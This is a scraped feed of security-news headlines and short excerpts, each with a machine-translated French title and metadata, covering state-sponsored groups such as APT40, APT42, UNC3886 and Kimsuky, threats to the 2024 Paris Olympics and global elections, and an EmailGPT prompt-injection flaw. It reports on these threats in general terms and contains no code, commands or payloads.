State Actor APT40 Exploits N-Day Vulnerabilities “Within Hours” A joint government advisory warned that the Chinese state-sponsored actor APT40 is capable of immediately exploiting newly public vulnerabilities in widely used software]]> 2024-07-09T12:30:00+00:00 https://www.infosecurity-magazine.com/news/chinese-state-exploits/ www.secnews.physaphae.fr/article.php?IdArticle=8533475 False Vulnerability APT 40 4.0000000000000000 IndustrialCyber - cyber risk firms for industrial Les agences mondiales mettent en garde contre les cyber-menaces APT40 de PRC \\ ciblant les réseaux internationaux australiens<br>Global agencies warn of PRC\\'s APT40 cyber threats targeting Australian, international networks Transnational cybersecurity agencies release an advisory outlining a People\'s Republic of China (PRC) state-sponsored cyber group and their... ]]> 2024-07-09T11:49:18+00:00 https://industrialcyber.co/cisa/global-agencies-warn-of-prcs-apt40-cyber-threats-targeting-australian-international-networks/ www.secnews.physaphae.fr/article.php?IdArticle=8533440 False None APT 40 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Les agences de cybersécurité mettent en garde contre l'adaptation à l'exploitation rapide d'APT40 \\<br>Cybersecurity Agencies Warn of China-linked APT40\\'s Rapid Exploit Adaptation Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. have released a joint advisory about a China-linked cyber espionage group called APT40, warning about its ability to co-opt exploits for newly disclosed security flaws within hours or days of public release. 
"APT 40 has previously targeted organizations in various countries, including]]> 2024-07-09T11:26:00+00:00 https://thehackernews.com/2024/07/cybersecurity-agencies-warn-of-china.html www.secnews.physaphae.fr/article.php?IdArticle=8533291 False Threat APT 40 3.0000000000000000 The Register - Site journalistique Anglais Le gang APT40 de la Chine est prêt à attaquer les vulns dans les heures ou les jours suivant la libération publique.<br>China\\'s APT40 gang is ready to attack vulns within hours or days of public release. Lax patching and vulnerable small biz kit make life easy for Beijing\'s secret-stealers Law enforcement agencies from eight nations, led by Australia, have issued an advisory that details the tradecraft used by China-aligned threat actor APT40 – aka Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk – and found it prioritizes developing exploits for newly found vulnerabilities and can target them within hours.…]]> 2024-07-09T02:33:07+00:00 https://go.theregister.com/feed/www.theregister.com/2024/07/09/apt_40_tradecraft_advisory/ www.secnews.physaphae.fr/article.php?IdArticle=8533187 False Vulnerability,Threat,Patching,Legislation APT 40 3.0000000000000000 Mandiant - Blog Sécu de Mandiant Couchée et secrète: Découvrir les opérations d'espionnage UNC3886<br>Cloaked and Covert: Uncovering UNC3886 Espionage Operations   Following the discovery of malware residing within ESXi hypervisors in September 2022, Mandiant began investigating numerous intrusions conducted by UNC3886, a suspected China-nexus cyber espionage actor that has targeted prominent strategic organizations on a global scale. In January 2023, Mandiant provided detailed analysis of the exploitation of a now-patched vulnerability in FortiOS employed by a threat actor suspected to be UNC3886. In March 2023, we provided details surrounding a custom malware ecosystem utilized on affected Fortinet devices. 
Furthermore, the investigation uncovered the compromise of VMware technologies, which facilitated access to guest virtual machines. Investigations into more recent operations in 2023 following fixes from the vendors involved in the investigation have corroborated Mandiant\'s initial observations that the actor operates in a sophisticated, cautious, and evasive nature. Mandiant has observed that UNC3886 employed several layers of organized persistence for redundancy to maintain access to compromised environments over time. Persistence mechanisms encompassed network devices, hypervisors, and virtual machines, ensuring alternative channels remain available even if the primary layer is detected and eliminated. This blog post discusses UNC3886\'s intrusion path and subsequent actions that were performed in the environments after compromising the guest virtual machines to achieve access to the critical systems, including: The use of publicly available rootkits for long-term persistence Deployment of malware that leveraged trusted third-party services for command and control (C2 or C&C) Subverting access and collecting credentials with Secure Shell (SSH) backdoors Extracting credentials from TACACS+ authentication using custom malware  Mandiant has published detection and hardening guidelines for ESXi hypervisors and attack techniques employed by UNC3886. 
For Google SecOps Enterprise+ customer]]> 2024-06-18T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations/ www.secnews.physaphae.fr/article.php?IdArticle=8520461 False Malware,Tool,Vulnerability,Threat,Cloud,Technical APT 41 3.0000000000000000 HackRead - Chercher Cyber Nouveau Flaw Emailgpt met les données utilisateur en danger: supprimez l'extension maintenant<br>New EmailGPT Flaw Puts User Data at Risk: Remove the Extension NOW Synopsys warns of a new prompt injection hack involving a security vulnerability in EmailGPT, a popular AI email…]]> 2024-06-06T20:46:03+00:00 https://hackread.com/emailgpt-flaw-user-data-at-risk-remove-extension/ www.secnews.physaphae.fr/article.php?IdArticle=8514311 False Hack,Vulnerability APT 42 2.0000000000000000 Mandiant - Blog Sécu de Mandiant Phishing pour l'or: cyber-menaces auxquelles sont confrontés les Jeux olympiques de Paris 2024<br>Phishing for Gold: Cyber Threats Facing the 2024 Paris Olympics   Executive Summary  Mandiant assesses with high confidence that the Paris Olympics faces an elevated risk of cyber threat activity, including cyber espionage, disruptive and destructive operations, financially-motivated activity, hacktivism, and information operations.  Olympics-related cyber threats could realistically impact various targets including event organizers and sponsors, ticketing systems, Paris infrastructure, and athletes and spectators traveling to the event.  Mandiant assesses with high confidence that Russian threat groups pose the highest risk to the Olympics. While China, Iran, and North Korea state sponsored actors also pose a moderate to low risk. To reduce the risk of cyber threats associated with the Paris Olympics, organizations should update their threat profiles, conduct security awareness training, and consider travel-related cyber risks. 
The security community is better prepared for the cyber threats facing the Paris Olympics than it has been for previous Games, thanks to the insights gained from past events. While some entities may face unfamiliar state-sponsored threats, many of the cybercriminal threats will be familiar. While the technical disruption caused by hacktivism and information operations is often temporary, these operations can have an outsized impact during high-profile events with a global audience. Introduction  The 2024 Summer Olympics taking place in Paris, France between July and August creates opportunities for a range of cyber threat actors to pursue profit, notoriety, and intelligence. For organizations involved in the event, understanding relevant threats is key to developing a resilient security posture. Defenders should prepare against a variety of threats that will likely be interested in targeting the Games for different reasons:  Cyber espionage groups are likely to target the 2024 Olympics for information gathering purposes, due to the volume of government officials and senior decision makers attending. Disruptive and destructive operations could potentially target the Games to cause negative psychological effects and reputational damage. This type of activity could take the form of website defacements, distributed denial of service (DDoS) attacks, the deployment of wiper malware, and operational technology (OT) targeting. As a high profile, large-scale sporting event with a global audience, the Olympics represents an ideal stage for such operations given that the impact of any disruption would be significantly magnified.  Information operations will likely leverage interest in the Olympics to spread narratives and disinformation to target audiences. In some cases, threat actors may leverage disruptive and destructive attacks to amplify the spread of particular narratives in hybrid operations. 
Financially-motivated actors are likely to target the Olympics in v]]> 2024-06-05T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-2024-paris-olympics/ www.secnews.physaphae.fr/article.php?IdArticle=8513588 False Ransomware,Malware,Threat,Studies,Mobile,Cloud,Technical APT 15,APT 31,APT 42 2.0000000000000000 DarkTrace - DarkTrace: AI bases detection Comment l'IA a attrapé APT41 exploitant les vulnérabilités<br>How AI Caught APT41 Exploiting Vulnerabilities Analyzing how the cyber-criminal group APT41 exploited a zero-day vulnerability, we show how Darktrace\'s AI detected and investigated the threat immediately.]]> 2024-05-30T02:45:40+00:00 https://darktrace.com/blog/catching-apt41-exploiting-a-zero-day-vulnerability www.secnews.physaphae.fr/article.php?IdArticle=8509713 False Vulnerability,Threat APT 41 3.0000000000000000 Bleeping Computer - Magazine Américain Les pirates Kimsuky déploient une nouvelle porte dérobée Linux en attaques contre la Corée du Sud<br>Kimsuky hackers deploy new Linux backdoor in attacks on South Korea The North Korean hacker group Kimsuki has been using a new Linux malware called Gomir that is a version of the GoBear backdoor delivered via trojanized software installers. [...]]]> 2024-05-16T09:28:37+00:00 https://www.bleepingcomputer.com/news/security/kimsuky-hackers-deploy-new-linux-backdoor-in-attacks-on-south-korea/ www.secnews.physaphae.fr/article.php?IdArticle=8501038 False Malware APT 43 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Faits saillants hebdomadaires, 13 mai 2024<br>Weekly OSINT Highlights, 13 May 2024 2024-05-13T13:30:14+00:00 https://community.riskiq.com/article/fd207107 www.secnews.physaphae.fr/article.php?IdArticle=8498946 False Spam,Malware,Tool,Vulnerability,Threat,Cloud APT 42 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 
Les pirates APT42 se présentent en tant que journalistes pour récolter les informations d'identification et accéder aux données du cloud<br>APT42 Hackers Pose as Journalists to Harvest Credentials and Access Cloud Data The Iranian state-backed hacking outfit called APT42 is making use of enhanced social engineering schemes to infiltrate target networks and cloud environments. Targets of the attack include Western and Middle Eastern NGOs, media organizations, academia, legal services and activists, Google Cloud subsidiary Mandiant said in a report published last week. "APT42 was]]> 2024-05-07T18:55:00+00:00 https://thehackernews.com/2024/05/apt42-hackers-pose-as-journalists-to.html www.secnews.physaphae.fr/article.php?IdArticle=8495241 False Cloud APT 42 4.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Uncharmed: les opérations APT42 de l'Iran démêle<br>Uncharmed: Untangling Iran\\'s APT42 Operations 2024-05-06T19:54:46+00:00 https://community.riskiq.com/article/7c5aa156 www.secnews.physaphae.fr/article.php?IdArticle=8494794 False Malware,Vulnerability,Threat,Patching,Cloud APT 42 3.0000000000000000 Bleeping Computer - Magazine Américain Les pirates iraniens se présentent en tant que journalistes pour pousser les logiciels malveillants de porte dérobée<br>Iranian hackers pose as journalists to push backdoor malware The Iranian state-backed threat actor tracked as APT42 is employing social engineering attacks, including posing as journalists, to breach corporate networks and cloud environments of Western and Middle Eastern targets. 
[...]]]> 2024-05-04T10:17:34+00:00 https://www.bleepingcomputer.com/news/security/iranian-hackers-pose-as-journalists-to-push-backdoor-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8493646 False Malware,Threat,Cloud APT 42 3.0000000000000000 Mandiant - Blog Sécu de Mandiant Uncharmed: Untangling Iran\'s APT42 Operations   APT42, an Iranian state-sponsored cyber espionage actor, is using enhanced social engineering schemes to gain access to victim networks, including cloud environments. The actor is targeting Western and Middle Eastern NGOs, media organizations, academia, legal services and activists. Mandiant assesses APT42 operates on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO). APT42 was observed posing as journalists and event organizers to build trust with their victims through ongoing correspondence, and to deliver invitations to conferences or legitimate documents. These social engineering schemes enabled APT42 to harvest credentials and use them to gain initial access to cloud environments. Subsequently, the threat actor covertly exfiltrated data of strategic interest to Iran, while relying on built-in features and open-source tools to avoid detection. In addition to cloud operations, we also outline recent malware-based APT42 operations using two custom backdoors: NICECURL and TAMECAT. These backdoors are delivered via spear phishing, providing the attackers with initial access that might be used as a command execution interface or as a jumping point to deploy additional malware. APT42 targeting and missions are consistent with its assessed affiliation with the IRGC-IO, which is a part of the Iranian intelligence apparatus that is responsible for monitoring and preventing foreign threats to the Islamic Republic and domestic unrest. 
APT42 activities overlap with the publicly reported actors CALANQUE (Google Threat Analysis Group), Charming Kitten (ClearSky and CERTFA), Mint Sandstorm/Phosphorus (Microsoft), TA453 (Proofpoint), Yellow Garuda (PwC), and ITG18 (]]> 2024-05-01T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/ www.secnews.physaphae.fr/article.php?IdArticle=8500390 False Malware,Tool,Threat,Cloud Yahoo,APT 35,APT 42 2.0000000000000000 Mandiant - Blog Sécu de Mandiant Pole Voûte: cyber-menaces aux élections mondiales<br>Poll Vaulting: Cyber Threats to Global Elections   Executive Summary The election cybersecurity landscape globally is characterized by a diversity of targets, tactics, and threats. Elections attract threat activity from a variety of threat actors including: state-sponsored actors, cyber criminals, hacktivists, insiders, and information operations as-a-service entities. Mandiant assesses with high confidence that state-sponsored actors pose the most serious cybersecurity risk to elections. Operations targeting election-related infrastructure can combine cyber intrusion activity, disruptive and destructive capabilities, and information operations, which include elements of public-facing advertisement and amplification of threat activity claims. Successful targeting does not automatically translate to high impact. Many threat actors have struggled to influence or achieve significant effects, despite their best efforts.  When we look across the globe we find that the attack surface of an election involves a wide variety of entities beyond voting machines and voter registries. In fact, our observations of past cycles indicate that cyber operations target the major players involved in campaigning, political parties, news and social media more frequently than actual election infrastructure.   
Securing elections requires a comprehensive understanding of many types of threats and tactics, from distributed denial of service (DDoS) to data theft to deepfakes, that are likely to impact elections in 2024. It is vital to understand the variety of relevant threat vectors and how they relate, and to ensure mitigation strategies are in place to address the full scope of potential activity.  Election organizations should consider steps to harden infrastructure against common attacks, and utilize account security tools such as Google\'s Advanced Protection Program to protect high-risk accounts. Introduction  The 2024 global election cybersecurity landscape is characterized by a diversity of targets, tactics, and threats. An expansive ecosystem of systems, administrators, campaign infrastructure, and public communications venues must be secured against a diverse array of operators and methods. Any election cybersecurity strategy should begin with a survey of the threat landscape to build a more proactive and tailored security posture.  The cybersecurity community must keep pace as more than two billion voters are expected to head to the polls in 2024. With elections in more than an estimated 50 countries, there is an opportunity to dynamically track how threats to democracy evolve. Understanding how threats are targeting one country will enable us to better anticipate and prepare for upcoming elections globally. At the same time, we must also appreciate the unique context of different countries. Election threats to South Africa, India, and the United States will inevitably differ in some regard. In either case, there is an opportunity for us to prepare with the advantage of intelligence.  
]]> 2024-04-25T10:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-global-elections/ www.secnews.physaphae.fr/article.php?IdArticle=8500393 False Ransomware,Malware,Hack,Tool,Vulnerability,Threat,Legislation,Cloud,Technical APT 40,APT 29,APT 28,APT 43,APT 31,APT 42 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Le groupe nord-coréen Kimsuk exploite DMARC et les balises Web<br>North Korean Group Kimsuky Exploits DMARC and Web Beacons Proofpoint confirmed Kimsuky has directly contacted foreign policy experts since 2023 through seemingly benign email conversations]]> 2024-04-17T15:30:00+00:00 https://www.infosecurity-magazine.com/news/kimsuky-exploits-dmarc-web-beacons/ www.secnews.physaphae.fr/article.php?IdArticle=8484216 False None APT 43 3.0000000000000000 ProofPoint - Cyber Firms De l'ingénierie sociale aux abus DMARC: Ta427 \\'s Art of Information Gathering<br>From Social Engineering to DMARC Abuse: TA427\\'s Art of Information Gathering 2024-04-16T06:00:54+00:00 https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering www.secnews.physaphae.fr/article.php?IdArticle=8483299 False Malware,Tool,Threat,Conference APT 37,APT 43 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Recherche Unarths Assaut multi-mineur de Rumbycarp \\ sur crypto<br>Research Unearths RUBYCARP\\'s Multi-Miner Assault on Crypto Sysdig stated that by deploying multiple miners, the group decreased attack time and detection risk]]> 2024-04-09T14:30:00+00:00 https://www.infosecurity-magazine.com/news/rubycarps-multi-miner-assault/ www.secnews.physaphae.fr/article.php?IdArticle=8478743 False None APT 40 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Faits saillants hebdomadaires, 8 avril 2024<br>Weekly OSINT Highlights, 8 April 2024 2024-04-08T15:09:15+00:00 https://community.riskiq.com/article/974639f2 www.secnews.physaphae.fr/article.php?IdArticle=8478203 False 
Ransomware,Spam,Malware,Tool,Threat,Cloud APT 41 3.0000000000000000